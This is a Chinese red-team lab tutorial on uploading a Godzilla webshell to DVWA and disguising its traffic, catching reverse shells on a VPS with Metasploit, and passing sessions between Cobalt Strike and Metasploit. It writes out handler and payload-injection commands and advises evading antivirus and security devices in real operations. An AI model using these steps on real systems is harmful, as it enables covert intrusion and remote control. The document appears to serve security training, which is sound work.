文章来源|MS08067 内网安全知识星球

本文作者:BlackCat(Ms08067内网安全小组成员)

内网纵横四海  认准Ms08067

环境:

Windows:  192.168.93.3
VPS:x.x.x.x
⼯具:CobaltStrike4.1、MSF、哥斯拉v2.92

实验场景DVWA靶场,通过靶场的上传漏洞位置,上传webshell

然后⽤冰蝎或者其他webshell⼯具连接:

冰蝎下载地址:

https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6

我这⾥⽤的上阶段⽐较⽕的哥斯拉,在哥斯拉安装之前,你需要安装jdk1.8的环境。双击Godzilla.jar打开,此时会在同⽬录下⽣成data.db数据库存放数据,同时它⽀持流量加密和修改特征,可以⼀定程度上防⽌被安服设备发现。同时可以⾃⽣成payload,

哥斯拉下载地址:⽬前最新的版本为V2.92

https://github.com/BeichenDream/Godzilla/releases/tag/v2.92-godzilla

个⼈感觉唯⼀缺点就是⻚⾯有点丑。

既然说了可以隐藏特征,那么这⾥我们就伪造⼀下特征:

⾸先wireshark抓包看下 未作修改的数据包是什么样⼦:

先⽣成⼀个payload:点击. ⻚⾯ -- 管理 -- ⽣成

webs hell有两种加密规则,Raw or Base64 加密

Raw:Raw是将加密后的数据直接发送或者输出
Base64:Base64是将加密后的数据再进⾏Base64编码

然后选择pass是连接密码,payload类型 ,⼀共是三种类型,

这⾥我的webshell⽂件是:1.php。

通过DVWA靶场上传到本地,然后链接shell ,⾥⾯参数⼀定要和我们创建的⼀样。

然后我们测试连接,成功后添加就⾏,

进⼊到操作模式,在命令执⾏处执⾏⼀条命令:dir,同时wireshark开启抓包

然后就是查看包内容:没更改之前是这样的

这⾥⼀些安服设备都会过滤  User-agent(简称UA),所以我们这⾥要根据对⽅的⽹络环境去修改:

添加⽬标处也可以更改,再次抓包发现成功 UA成功修改了。

⾄此webshell⽅⾯基本就不需要我们再去配置什么了,如果为了保险起⻅可以在对webshell进⾏⼀定的隐蔽。

接下来就是CS、MSF上线。

这⾥他有⾃带的反弹shell⼯具 ;先尝试能否成功,打开我们的VPS 机的MSF 按照他的配置进⾏配置 ,然后 run 开始监听 10086端⼝观测 VPS动态,发现成功反弹shell。

这⾥ MSF已经上线,我们现在要让CS 也上线,

这⾥发现⼀个问题,脚本shell的权限很不稳,MSF权限经常会丢失,所以还是建议直接上传CS⻢或者通过其他⽅式上线CS。这⾥上传CS⻢⽅式,实战中注意免杀。

通过webshell⼯具的⽂件上传到本地机器⽬录。然后运⾏上线直接管理员权限,都省着我提权了,这⾥推荐⼏个提权CS插件:

https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
https://github.com/zer0yu/Awesome-CobaltStrike

尝试把CS会话在MSF端上线

当CobaltStrike获得了⼀个上线机器,想把这个⽬标传给Metasploit中的meterpreter,获得⼀个session进⾏控制。在Metasploit执⾏以下命令:

MSF:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost vps:IP
set lport 10010
exploit -j #-j 后台监听 可不选

CS:

⾸先有⼀个已经建⽴会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:10010

选择我们刚才建⽴的 listener ,然后等待MSF端,过程⼤概1-2分钟

MSF会话反弹给CS:

这⾥只是为了实验,所以就⽤这个CS反弹来的shell,实际中请结合具体内⽹情况。
CS适合外围突破,MSF适合内⽹横向,当然也看个⼈喜好

1、⾸先把msf上获取到的meterpreter挂在后台运⾏

Background  #就是返回的意思

CS :创建⼀个监听,payload⽅式要与MSF相同即可。

MSF:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set disablepayloadhandler true
#默认情况下,payload_inject执⾏之后会在本地产⽣⼀个新的handler,由于我们已经有了⼀个,所以
不需要在产⽣⼀个,所以这⾥我们设置为true
set lhost x.x.x.x                     #cobaltstrike监听的ip
set lport 10001                       #cobaltstrike监听的端⼝
set session 1                         #这⾥是获得的session的id
exploit

然后正常情况下 等待上线即可,我这⾥不做演示了,因为 VPS卡死了。。。

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

 

目前40000+人已关注加入我们

webshell流量隐蔽CS和MSF联动相关推荐

  1. CS + MSF 联动

    CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpret ...

  2. 遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

    # zTian.red:绕过卡巴斯基.360安全卫士.Windows Defender动态执行CS.MSF命令... 测试目标:Windows Defender.卡巴斯基.360安全卫士极速版 系统环 ...

  3. apache日志 waf_WAF对WebShell流量检测的性能分析

    最近在一次授权渗透测试中遇到了一个棘手的场景,万能的队友已经找到了后台上传点,并传了小马然后开心地用antsword进行连接,但是由于明文传输很快被waf感知,并引起了管理员的注意,很快我们的马被清了 ...

  4. cs与msf的联合使用

    cs和msf在内网渗透中的作用 cs主要用于,反弹会话,提权,内网渗透防线,但cs的exp,提权方面没有msf强,但cs以操作简单,图形化界面,比msf强,使用两种工具结合可以很好的完成渗透测试工作, ...

  5. webshell流量一键解密——webshellDecrypt

    webshell流量一键解密--webshellDecrypt 访问地址 主要功能 一.常见webshell流量一键解密: 二.AES专项解密: 三.各类单项解密: 四.自定义js解密: 五.复制剪贴 ...

  6. cs和msf配合进行内网的操作

    cs中直接添加一个socks代理 msf中的操作相应的cs中socks的代理端口,然后利用msf对内网进一步的探测 setg Proxies socks4:xxx.xxx.xxx.xxx:44803

  7. cs和msf实现内网横向移动3

    注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限 一.通过172.16.1.123确定 ...

  8. 红队攻防之从边界突破到漫游内网(无cs和msf)

    前言 网络安全的本质:懂进攻,知防守,先正向,后逆向. 本篇文章目录 网络拓扑图: 本次红队攻防实战所需绘制的拓扑图如下: 边界突破 访问网站: http://xxx.xxx.xxx/?id=1 首页 ...

  9. frp内网穿透教程2022最新(含内网ssh配置与msf联动配置)

    1.frp简介 frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发. 1. ...

  10. Cobalt Strike与Metasploit Framewor联动(会话传递)功能演示

    一.前言 Cobalt Strike 是一个为模拟对手和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁.CS集成了很多功能,这些功能为渗透测试提供了便利的操作.同时CS还支持丰富的插件, ...

最新文章

  1. linux mysql软件_「Linux」 - 常用软件安装-MySql
  2. java jtable刷新_使用Swing timer实现Jtable数据定时更新
  3. centos7修改ip地址命令_CentOS7 安装 httpd 服务
  4. java过滤器经典案例_JAVA语言基础的经典案例:猜字母游戏
  5. Android内部存储与外部存储解析
  6. C/C++:Windows编程—Windows RPC 传递自定义数据类型、自定义数据类型数组、指针数组
  7. 鼠标悬停在li标签上时显示一个弹框_HTML标签——列表标签
  8. 文末福利 | 学习如何构建行业知识图谱(以医疗行业为例)
  9. BZOJ4197: [Noi2015]寿司晚宴
  10. 用foxmail绑定邮箱提示用户名或密码错误
  11. 翻译--CenterNet-将目标看作点
  12. ARCore从零到一 (1) 搭建开发环境
  13. 基于snowfall的玫瑰花瓣飘落效果
  14. Java类管理机制——包的详解
  15. JavaMail 邮件附件名乱码问题
  16. Android图片上传的两种方式
  17. 用英语表达“谢谢”,thank you,thank you very much的其他多种方式
  18. Linux安装库时安装源错误,linux环境下golang安装第三方库的时候出错的决办法
  19. 自媒体短视频搬运如何伪原创上热门!老司机教你伪原创短视频的做法
  20. 解决Maven项目创建太慢的问题

热门文章

  1. 软件外包平台列表(转载-知乎网)
  2. 程序员做外包有前途吗?
  3. 早这么讲运算放大器的开环增益,我现在都是高手了
  4. 【IC4】运算放大器的开环增益,开环输出电压
  5. 22年新款MacBookAir屏幕解析
  6. Mac屏幕分辨率如何更改?
  7. 手机屏幕分辨率真的是越高越清晰吗?
  8. Trustzone的一些理解
  9. 参数检验和非参数检验的区别
  10. python拟合直线的斜率_Python:直线,斜率k是已知的,一点P1是已知的,长度P1P2是已知的,如何得到P2?...